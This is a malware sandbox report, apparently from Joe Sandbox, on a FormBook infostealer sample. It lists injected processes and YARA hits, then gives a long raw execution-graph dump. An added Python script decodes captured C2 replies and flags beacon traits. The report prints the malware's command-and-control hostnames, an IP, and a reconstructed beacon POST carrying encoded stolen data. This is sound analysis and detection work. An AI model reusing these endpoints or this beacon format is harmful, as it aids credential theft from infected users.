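Every reply above uses chunked transfer encoding, and the www.t91rl7.pro replies are gzip-compressed on top of that, so the "Data Ascii" rendering interleaves chunk sizes with the payload (the 4e and c inside session 30's script are chunk lengths, not part of the base64). The Python below is an added example, not part of the Joe Sandbox report or of the sample: it reassembles the bodies from the Data Raw bytes on this page, decodes the atob() redirect carried by session 30's 200 OK, and lists the header-level traits the POSTs in sessions 25 to 29 share. The two byte strings are copied from the Data Raw lines of sessions 30 and 27; the header dictionaries, the reconstructed session 27 request and the indicator labels are constructed for the example.

```python
import base64
import gzip
import re

# Copied from the "Data Raw" lines of session 30 (chunked, plain) and
# session 27 (chunked + gzip) above. bytes.fromhex() ignores the spaces.
SESSION_30_RAW = bytes.fromhex(
    "34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d"
    " 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 32 59 7a 49 7a 4c 6e 51 35 4d 57 6c 31 64"
    " 79 35 77 63 6d 38 36 4f 54 67 78 4d 51 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30"
    " 0d 0a 0d 0a"
)
SESSION_27_RAW = bytes.fromhex(
    "36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50"
    " d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 46 91 55 9e 55"
    " 3e 79 81 a6 be e1 39 86 29 95 a6 e5 c9 b9 16 66 fe 21 e9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 96 c0 e2"
    " a3 5a 00 00 00 0d 0a 30 0d 0a 0d 0a"
)

# Constructed from the request of session 27 as printed above (header text is
# the report's; the CRLF framing is reassembled here).
SESSION_27_REQUEST = (
    "POST /jhb8/ HTTP/1.1\r\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Accept-Language: en-US\r\n"
    "Host: www.t91rl7.pro\r\n"
    "Origin: http://www.t91rl7.pro\r\n"
    "Referer: http://www.t91rl7.pro/jhb8/\r\n"
    "Cache-Control: no-cache\r\n"
    "Content-Length: 204\r\n"
    "Connection: close\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile\r\n"
    "\r\n"
    "jNn=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/T2Oe3Ch0ezW8qVkDlOa1JxLGuR+18HhHF1nAvkk="
)


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: <hex size>CRLF <data>CRLF ... 0CRLF CRLF."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last-chunk; trailers, if any, follow
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def decode_body(raw: bytes, headers: dict) -> bytes:
    """Undo Transfer-Encoding first, then Content-Encoding (the order the server applied them in reverse)."""
    body = raw
    if headers.get("Transfer-Encoding", "").lower() == "chunked":
        body = dechunk(body)
    if headers.get("Content-Encoding", "").lower() == "gzip":
        body = gzip.decompress(body)
    return body


_REDIRECT = re.compile(rb"location\[[^\]]*\]\s*=\s*atob\('([A-Za-z0-9+/=]+)'\)")


def extract_redirect(html: bytes):
    """Return the URL hidden in location[...] = atob('...'), or None if the body has no such stub."""
    m = _REDIRECT.search(html)
    return base64.b64decode(m.group(1)).decode("ascii") if m else None


def beacon_indicators(request: str) -> list:
    """Header-level traits shared by the POSTs in sessions 25 to 29; each alone is weak, together they filter well."""
    head, _, body = request.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {k.strip().lower(): v.strip()
               for k, v in (line.split(":", 1) for line in header_lines)}
    method, target, _ = request_line.split(" ", 2)
    path = target.split("?", 1)[0]
    host = headers.get("host", "")
    hits = []
    if headers.get("user-agent", "").startswith("UCWEB/2.0"):
        hits.append("fixed mobile User-Agent sent by a Windows process")
    if re.fullmatch(r"/[a-z0-9]{3,5}/", path):
        hits.append("short alphanumeric directory path")
    if headers.get("origin") == "http://" + host and headers.get("referer") == "http://" + host + path:
        hits.append("Origin and Referer synthesized from Host")
    if method == "POST" and re.fullmatch(r"[A-Za-z0-9]{2,4}=[A-Za-z0-9+/=]+", body):
        hits.append("single base64-like form field")
    return hits


if __name__ == "__main__":
    html = decode_body(SESSION_30_RAW, {"Transfer-Encoding": "chunked"})
    print(html.decode())
    print("redirect ->", extract_redirect(html))
    gz = decode_body(SESSION_27_RAW, {"Transfer-Encoding": "chunked", "Content-Encoding": "gzip"})
    print(len(gz), "bytes after gunzip, starting", gz[:17])
    print(beacon_indicators(SESSION_27_REQUEST))
```

Run as a script it prints the reassembled session 30 body and its decoded target, https://6c23.t91iuw.pro:9811, which is a different host and port from the www.t91rl7.pro:80 endpoint the sample actually contacted, so it is worth checking against the report's DNS and IP lists rather than assuming it was reached. Inflating session 27's 200 OK gives 90 bytes that open with the same `<script>location[` preamble, so the "successful" replies from 154.88.22.101 are redirect stubs too, not an acknowledgement of the posted data; whether the posted field was accepted cannot be read from the HTTP status alone.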



                                                                            Target ID:0
                                                                            Start time:21:28:58
                                                                            Start date:10/01/2025
                                                                            Path:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\1SxKeB4u0c.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'794'048 bytes
                                                                            MD5 hash:897FF2A936F11B8F74F56E0C835A2C43
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:21:28:58
                                                                            Start date:10/01/2025
                                                                            Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                            Imagebase:0x400000
                                                                            File size:1'658'880 bytes
                                                                            MD5 hash:C14356FC1BFD5700FA1D54D53D65507C
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:3
                                                                            Start time:21:28:58
                                                                            Start date:10/01/2025
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\1SxKeB4u0c.exe"
                                                                            Imagebase:0xf50000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1682840085.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1678896334.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1683604299.0000000003600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:21:28:59
                                                                            Start date:10/01/2025
                                                                            Path:C:\Windows\System32\alg.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\alg.exe
                                                                            Imagebase:0x140000000
                                                                            File size:1'594'368 bytes
                                                                            MD5 hash:212514466AE3CEB072CE28C89C73B2D2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:6
                                                                            Start time:21:29:15
                                                                            Start date:10/01/2025
                                                                            Path:C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe"
                                                                            Imagebase:0x130000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3897666427.0000000002B80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:21:29:17
                                                                            Start date:10/01/2025
                                                                            Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                                            Imagebase:0x620000
                                                                            File size:186'880 bytes
                                                                            MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3894297177.0000000003260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3897117965.0000000003740000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3897375687.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:8
                                                                            Start time:21:29:30
                                                                            Start date:10/01/2025
                                                                            Path:C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe"
                                                                            Imagebase:0x130000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3900036415.0000000005260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:10
                                                                            Start time:21:29:42
                                                                            Start date:10/01/2025
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6d20e0000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:3.6%
                                                                              Dynamic/Decrypted Code Coverage:6.8%
                                                                              Signature Coverage:9%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:63
                                                                              execution_graph: [node/edge listing of the interactive execution-graph widget (node addresses with resolved API names such as SetFilePointerEx, PeekMessageW, RtlAllocateHeap, GetFileAttributesW, EnterCriticalSection); the raw widget data is not reproduced here]
109290->109351 109292 425359 109291->109292 109308 424a3d 109291->109308 109307 425415 LeaveCriticalSection LeaveCriticalSection _fseek 109292->109307 109295 42534e 109352 428db6 9 API calls __wfsopen 109295->109352 109301 425377 109325 430a02 109301->109325 109303 42537d 109303->109292 109304 422d55 _free 58 API calls 109303->109304 109304->109292 109305->109275 109306->109276 109307->109276 109309 424a50 109308->109309 109313 424a74 109308->109313 109310 4246e6 __fclose_nolock 58 API calls 109309->109310 109309->109313 109311 424a6d 109310->109311 109353 42d886 109311->109353 109314 430b77 109313->109314 109315 425371 109314->109315 109316 430b84 109314->109316 109318 4246e6 109315->109318 109316->109315 109317 422d55 _free 58 API calls 109316->109317 109317->109315 109319 4246f0 109318->109319 109320 424705 109318->109320 109495 428b28 58 API calls __getptd_noexit 109319->109495 109320->109301 109322 4246f5 109496 428db6 9 API calls __wfsopen 109322->109496 109324 424700 109324->109301 109326 430a0e __wfsopen 109325->109326 109327 430a32 109326->109327 109328 430a1b 109326->109328 109330 430abd 109327->109330 109332 430a42 109327->109332 109512 428af4 58 API calls __getptd_noexit 109328->109512 109517 428af4 58 API calls __getptd_noexit 109330->109517 109331 430a20 109513 428b28 58 API calls __getptd_noexit 109331->109513 109335 430a60 109332->109335 109336 430a6a 109332->109336 109514 428af4 58 API calls __getptd_noexit 109335->109514 109340 42d206 ___lock_fhandle 59 API calls 109336->109340 109337 430a65 109518 428b28 58 API calls __getptd_noexit 109337->109518 109338 430a27 __wfsopen 109338->109303 109342 430a70 109340->109342 109344 430a83 109342->109344 109345 430a8e 109342->109345 109343 430ac9 109519 428db6 9 API calls __wfsopen 109343->109519 109497 430add 109344->109497 109515 428b28 58 API calls __getptd_noexit 109345->109515 109349 430a89 109516 430ab5 LeaveCriticalSection __unlock_fhandle 109349->109516 109351->109295 109352->109292 109354 42d892 
__wfsopen 109353->109354 109355 42d8b6 109354->109355 109356 42d89f 109354->109356 109358 42d955 109355->109358 109360 42d8ca 109355->109360 109454 428af4 58 API calls __getptd_noexit 109356->109454 109460 428af4 58 API calls __getptd_noexit 109358->109460 109359 42d8a4 109455 428b28 58 API calls __getptd_noexit 109359->109455 109363 42d8f2 109360->109363 109364 42d8e8 109360->109364 109381 42d206 109363->109381 109456 428af4 58 API calls __getptd_noexit 109364->109456 109365 42d8ed 109461 428b28 58 API calls __getptd_noexit 109365->109461 109366 42d8ab __wfsopen 109366->109313 109369 42d8f8 109371 42d90b 109369->109371 109372 42d91e 109369->109372 109390 42d975 109371->109390 109457 428b28 58 API calls __getptd_noexit 109372->109457 109373 42d961 109462 428db6 9 API calls __wfsopen 109373->109462 109377 42d917 109459 42d94d LeaveCriticalSection __unlock_fhandle 109377->109459 109378 42d923 109458 428af4 58 API calls __getptd_noexit 109378->109458 109382 42d212 __wfsopen 109381->109382 109383 42d261 EnterCriticalSection 109382->109383 109385 429c0b __lock 58 API calls 109382->109385 109384 42d287 __wfsopen 109383->109384 109384->109369 109386 42d237 109385->109386 109387 42d24f 109386->109387 109463 429e2b InitializeCriticalSectionAndSpinCount 109386->109463 109464 42d28b LeaveCriticalSection _doexit 109387->109464 109391 42d982 __ftell_nolock 109390->109391 109392 42d9e0 109391->109392 109393 42d9c1 109391->109393 109424 42d9b6 109391->109424 109396 42da1c 109392->109396 109399 42da38 109392->109399 109474 428af4 58 API calls __getptd_noexit 109393->109474 109477 428af4 58 API calls __getptd_noexit 109396->109477 109397 42e1d6 109397->109377 109398 42d9c6 109475 428b28 58 API calls __getptd_noexit 109398->109475 109402 42da51 109399->109402 109480 4318c1 60 API calls 3 library calls 109399->109480 109465 435c6b 109402->109465 109403 42da21 109478 428b28 58 API calls __getptd_noexit 109403->109478 109404 42d9cd 109476 428db6 9 API calls __wfsopen 109404->109476 
109409 42da5f 109411 42ddb8 109409->109411 109481 4299ac 58 API calls 2 library calls 109409->109481 109410 42da28 109479 428db6 9 API calls __wfsopen 109410->109479 109412 42ddd6 109411->109412 109413 42e14b WriteFile 109411->109413 109416 42defa 109412->109416 109422 42ddec 109412->109422 109417 42ddab GetLastError 109413->109417 109426 42dd78 109413->109426 109428 42dfef 109416->109428 109430 42df05 109416->109430 109417->109426 109418 42da8b GetConsoleMode 109418->109411 109420 42daca 109418->109420 109419 42e184 109419->109424 109486 428b28 58 API calls __getptd_noexit 109419->109486 109420->109411 109421 42dada GetConsoleCP 109420->109421 109421->109419 109451 42db09 109421->109451 109422->109419 109423 42de5b WriteFile 109422->109423 109423->109417 109429 42de98 109423->109429 109488 42c5f6 109424->109488 109426->109419 109426->109424 109427 42ded8 109426->109427 109432 42dee3 109427->109432 109433 42e17b 109427->109433 109428->109419 109434 42e064 WideCharToMultiByte 109428->109434 109429->109422 109435 42debc 109429->109435 109430->109419 109436 42df6a WriteFile 109430->109436 109431 42e1b2 109487 428af4 58 API calls __getptd_noexit 109431->109487 109483 428b28 58 API calls __getptd_noexit 109432->109483 109485 428b07 58 API calls 3 library calls 109433->109485 109434->109417 109447 42e0ab 109434->109447 109435->109426 109436->109417 109440 42dfb9 109436->109440 109440->109426 109440->109430 109440->109435 109441 42dee8 109484 428af4 58 API calls __getptd_noexit 109441->109484 109442 42e0b3 WriteFile 109445 42e106 GetLastError 109442->109445 109442->109447 109445->109447 109446 4362ba 60 API calls __write_nolock 109446->109451 109447->109426 109447->109428 109447->109435 109447->109442 109448 437a5e WriteConsoleW CreateFileW __putwch_nolock 109452 42dc5f 109448->109452 109449 42dbf2 WideCharToMultiByte 109449->109426 109450 42dc2d WriteFile 109449->109450 109450->109417 109450->109452 109451->109426 109451->109446 109451->109449 109451->109452 109482 
4235f5 58 API calls __isleadbyte_l 109451->109482 109452->109417 109452->109426 109452->109448 109452->109451 109453 42dc87 WriteFile 109452->109453 109453->109417 109453->109452 109454->109359 109455->109366 109456->109365 109457->109378 109458->109377 109459->109366 109460->109365 109461->109373 109462->109366 109463->109387 109464->109383 109466 435c76 109465->109466 109468 435c83 109465->109468 109467 428b28 __wfsopen 58 API calls 109466->109467 109469 435c7b 109467->109469 109470 435c8f 109468->109470 109471 428b28 __wfsopen 58 API calls 109468->109471 109469->109409 109470->109409 109472 435cb0 109471->109472 109473 428db6 __wfsopen 9 API calls 109472->109473 109473->109469 109474->109398 109475->109404 109476->109424 109477->109403 109478->109410 109479->109424 109480->109402 109481->109418 109482->109451 109483->109441 109484->109424 109485->109424 109486->109431 109487->109424 109489 42c600 IsProcessorFeaturePresent 109488->109489 109490 42c5fe 109488->109490 109492 43590a 109489->109492 109490->109397 109493 4358b9 ___raise_securityfailure 5 API calls 109492->109493 109494 4359ed 109493->109494 109494->109397 109495->109322 109496->109324 109520 42d4c3 109497->109520 109499 430b41 109533 42d43d 59 API calls 2 library calls 109499->109533 109501 430aeb 109501->109499 109504 42d4c3 __lseek_nolock 58 API calls 109501->109504 109511 430b1f 109501->109511 109502 42d4c3 __lseek_nolock 58 API calls 109506 430b2b CloseHandle 109502->109506 109503 430b49 109510 430b6b 109503->109510 109534 428b07 58 API calls 3 library calls 109503->109534 109505 430b16 109504->109505 109507 42d4c3 __lseek_nolock 58 API calls 109505->109507 109506->109499 109508 430b37 GetLastError 109506->109508 109507->109511 109508->109499 109510->109349 109511->109499 109511->109502 109512->109331 109513->109338 109514->109337 109515->109349 109516->109338 109517->109337 109518->109343 109519->109338 109521 42d4e3 109520->109521 109522 42d4ce 109520->109522 109526 42d508 109521->109526 109537 
428af4 58 API calls __getptd_noexit 109521->109537 109535 428af4 58 API calls __getptd_noexit 109522->109535 109525 42d4d3 109536 428b28 58 API calls __getptd_noexit 109525->109536 109526->109501 109527 42d512 109538 428b28 58 API calls __getptd_noexit 109527->109538 109530 42d51a 109539 428db6 9 API calls __wfsopen 109530->109539 109531 42d4db 109531->109501 109533->109503 109534->109510 109535->109525 109536->109531 109537->109527 109538->109530 109539->109531 109566 407a16 109540->109566 109542 40646a 109573 40750f 109542->109573 109544 406484 Mailbox 109544->109139 109547 407d8c 59 API calls 109561 406265 109547->109561 109548 40750f 59 API calls 109548->109561 109549 43dff6 109586 45f8aa 91 API calls 4 library calls 109549->109586 109553 43e004 109554 40750f 59 API calls 109553->109554 109556 43e01a 109554->109556 109555 406799 _memmove 109587 45f8aa 91 API calls 4 library calls 109555->109587 109556->109544 109557 43df92 109583 408029 109557->109583 109560 43df9d 109564 420db6 Mailbox 59 API calls 109560->109564 109561->109542 109561->109547 109561->109548 109561->109549 109561->109555 109561->109557 109562 407e4f 59 API calls 109561->109562 109571 405f6c 60 API calls 109561->109571 109572 405d41 59 API calls Mailbox 109561->109572 109581 405e72 60 API calls 109561->109581 109582 407924 59 API calls 2 library calls 109561->109582 109563 40643b CharUpperBuffW 109562->109563 109563->109561 109564->109555 109565->109142 109567 420db6 Mailbox 59 API calls 109566->109567 109568 407a3b 109567->109568 109569 408029 59 API calls 109568->109569 109570 407a4a 109569->109570 109570->109561 109571->109561 109572->109561 109574 4075af 109573->109574 109579 407522 _memmove 109573->109579 109576 420db6 Mailbox 59 API calls 109574->109576 109575 420db6 Mailbox 59 API calls 109577 407529 109575->109577 109576->109579 109578 420db6 Mailbox 59 API calls 109577->109578 109580 407552 109577->109580 109578->109580 109579->109575 109580->109544 109581->109561 109582->109561 109584 
420db6 Mailbox 59 API calls 109583->109584 109585 408033 109584->109585 109585->109560 109586->109553 109587->109544 109806 404bb5 109588->109806 109593 43d8e6 109596 404e4a 84 API calls 109593->109596 109594 404e08 LoadLibraryExW 109816 404b6a 109594->109816 109598 43d8ed 109596->109598 109600 404b6a 3 API calls 109598->109600 109602 43d8f5 109600->109602 109601 404e2f 109601->109602 109603 404e3b 109601->109603 109842 404f0b 109602->109842 109604 404e4a 84 API calls 109603->109604 109606 404e40 109604->109606 109606->109159 109606->109162 109609 43d91c 109850 404ec7 109609->109850 109613 407667 59 API calls 109612->109613 109614 4045b1 109613->109614 109615 407667 59 API calls 109614->109615 109616 4045b9 109615->109616 109617 407667 59 API calls 109616->109617 109618 4045c1 109617->109618 109619 407667 59 API calls 109618->109619 109620 4045c9 109619->109620 109621 43d4d2 109620->109621 109622 4045fd 109620->109622 109623 408047 59 API calls 109621->109623 109624 40784b 59 API calls 109622->109624 109625 43d4db 109623->109625 109626 40460b 109624->109626 110036 407d8c 109625->110036 110032 407d2c 109626->110032 109629 404615 109630 404640 109629->109630 109631 40784b 59 API calls 109629->109631 109633 40465f 109630->109633 109646 404680 109630->109646 109648 43d4fb 109630->109648 109634 404636 109631->109634 109638 4079f2 59 API calls 109633->109638 109637 407d2c 59 API calls 109634->109637 109635 404691 109639 4046a3 109635->109639 109642 408047 59 API calls 109635->109642 109636 43d5cb 109640 407bcc 59 API calls 109636->109640 109637->109630 109641 404669 109638->109641 109643 4046b3 109639->109643 109644 408047 59 API calls 109639->109644 109658 43d588 109640->109658 109645 40784b 59 API calls 109641->109645 109641->109646 109642->109639 109647 408047 59 API calls 109643->109647 109649 4046ba 109643->109649 109644->109643 109645->109646 110019 40784b 109646->110019 109647->109649 109648->109636 109650 43d5b4 109648->109650 109656 43d532 109648->109656 109651 
408047 59 API calls 109649->109651 109660 4046c1 Mailbox 109649->109660 109650->109636 109652 43d59f 109650->109652 109651->109660 109655 407bcc 59 API calls 109652->109655 109653 43d590 109654 407bcc 59 API calls 109653->109654 109654->109658 109655->109658 109656->109653 109661 43d57b 109656->109661 109657 4079f2 59 API calls 109657->109658 109658->109646 109658->109657 110040 407924 59 API calls 2 library calls 109658->110040 109660->109191 109662 407bcc 59 API calls 109661->109662 109662->109658 109664 407e4f 59 API calls 109663->109664 109665 4079fd 109664->109665 109665->109197 109665->109200 109667 407b40 109666->109667 109668 43ec6b 109666->109668 110045 407a51 109667->110045 110051 457bdb 59 API calls _memmove 109668->110051 109671 407b4c 109671->109206 109672 43ec75 109673 408047 59 API calls 109672->109673 109674 43ec7d Mailbox 109673->109674 109785 409b4d 109784->109785 109786 409b52 109784->109786 109785->109786 110147 42358a 59 API calls 109785->110147 109786->109148 109789 43ed4a 109788->109789 109790 407cbf 109788->109790 109792 408029 59 API calls 109789->109792 110148 407c50 109790->110148 109794 43ed55 __NMSG_WRITE _memmove 109792->109794 109793 407cca 109793->109183 109795->109184 109796->109198 109798 407c45 109797->109798 109799 407bd8 __NMSG_WRITE 109797->109799 109800 407d2c 59 API calls 109798->109800 109801 407c13 109799->109801 109802 407bee 109799->109802 109805 407bf6 _memmove 109800->109805 109803 408029 59 API calls 109801->109803 109804 407f27 59 API calls 109802->109804 109803->109805 109804->109805 109805->109207 109855 404c03 109806->109855 109809 404bdc 109811 404bf5 109809->109811 109812 404bec FreeLibrary 109809->109812 109810 404c03 2 API calls 109810->109809 109813 42525b 109811->109813 109812->109811 109859 425270 109813->109859 109815 404dfc 109815->109593 109815->109594 109940 404c36 109816->109940 109819 404b8f 109821 404ba1 FreeLibrary 109819->109821 109822 404baa 109819->109822 109820 404c36 2 API calls 109820->109819 
109821->109822 109823 404c70 109822->109823 109824 420db6 Mailbox 59 API calls 109823->109824 109825 404c85 109824->109825 109944 40522e 109825->109944 109827 404c91 _memmove 109828 404dc1 109827->109828 109829 404d89 109827->109829 109833 404ccc 109827->109833 109958 46991b 95 API calls 109828->109958 109947 404e89 CreateStreamOnHGlobal 109829->109947 109830 404ec7 69 API calls 109839 404cd5 109830->109839 109833->109830 109834 404f0b 74 API calls 109834->109839 109835 404d69 109835->109601 109837 43d8a7 109838 404ee5 85 API calls 109837->109838 109840 43d8bb 109838->109840 109839->109834 109839->109835 109839->109837 109953 404ee5 109839->109953 109841 404f0b 74 API calls 109840->109841 109841->109835 109843 404f1d 109842->109843 109844 43d9cd 109842->109844 109976 4255e2 109843->109976 109847 469109 109996 468f5f 109847->109996 109849 46911f 109849->109609 109851 43d990 109850->109851 109852 404ed6 109850->109852 110001 425c60 109852->110001 109854 404ede 109856 404bd0 109855->109856 109857 404c0c LoadLibraryA 109855->109857 109856->109809 109856->109810 109857->109856 109858 404c1d GetProcAddress 109857->109858 109858->109856 109862 42527c __wfsopen 109859->109862 109860 42528f 109908 428b28 58 API calls __getptd_noexit 109860->109908 109862->109860 109864 4252c0 109862->109864 109863 425294 109909 428db6 9 API calls __wfsopen 109863->109909 109878 4304e8 109864->109878 109867 4252c5 109868 4252db 109867->109868 109869 4252ce 109867->109869 109870 425305 109868->109870 109871 4252e5 109868->109871 109910 428b28 58 API calls __getptd_noexit 109869->109910 109893 430607 109870->109893 109911 428b28 58 API calls __getptd_noexit 109871->109911 109877 42529f __wfsopen @_EH4_CallFilterFunc@8 109877->109815 109879 4304f4 __wfsopen 109878->109879 109880 429c0b __lock 58 API calls 109879->109880 109887 430502 109880->109887 109881 430576 109913 4305fe 109881->109913 109882 43057d 109918 42881d 58 API calls 2 library calls 109882->109918 109885 430584 109885->109881 
109919 429e2b InitializeCriticalSectionAndSpinCount 109885->109919 109886 4305f3 __wfsopen 109886->109867 109887->109881 109887->109882 109889 429c93 __mtinitlocknum 58 API calls 109887->109889 109916 426c50 59 API calls __lock 109887->109916 109917 426cba LeaveCriticalSection LeaveCriticalSection _doexit 109887->109917 109889->109887 109891 4305aa EnterCriticalSection 109891->109881 109894 430627 __wopenfile 109893->109894 109895 430641 109894->109895 109907 4307fc 109894->109907 109926 4237cb 60 API calls 2 library calls 109894->109926 109924 428b28 58 API calls __getptd_noexit 109895->109924 109897 430646 109925 428db6 9 API calls __wfsopen 109897->109925 109899 425310 109912 425332 LeaveCriticalSection LeaveCriticalSection _fseek 109899->109912 109900 43085f 109921 4385a1 109900->109921 109903 4307f5 109903->109907 109927 4237cb 60 API calls 2 library calls 109903->109927 109905 430814 109905->109907 109928 4237cb 60 API calls 2 library calls 109905->109928 109907->109895 109907->109900 109908->109863 109909->109877 109910->109877 109911->109877 109912->109877 109920 429d75 LeaveCriticalSection 109913->109920 109915 430605 109915->109886 109916->109887 109917->109887 109918->109885 109919->109891 109920->109915 109929 437d85 109921->109929 109923 4385ba 109923->109899 109924->109897 109925->109899 109926->109903 109927->109905 109928->109907 109931 437d91 __wfsopen 109929->109931 109930 437da7 109932 428b28 __wfsopen 58 API calls 109930->109932 109931->109930 109934 437ddd 109931->109934 109933 437dac 109932->109933 109935 428db6 __wfsopen 9 API calls 109933->109935 109936 437e4e __wsopen_nolock 109 API calls 109934->109936 109939 437db6 __wfsopen 109935->109939 109937 437df9 109936->109937 109938 437e22 __wsopen_helper LeaveCriticalSection 109937->109938 109938->109939 109939->109923 109941 404b83 109940->109941 109942 404c3f LoadLibraryA 109940->109942 109941->109819 109941->109820 109942->109941 109943 404c50 GetProcAddress 109942->109943 109943->109941 
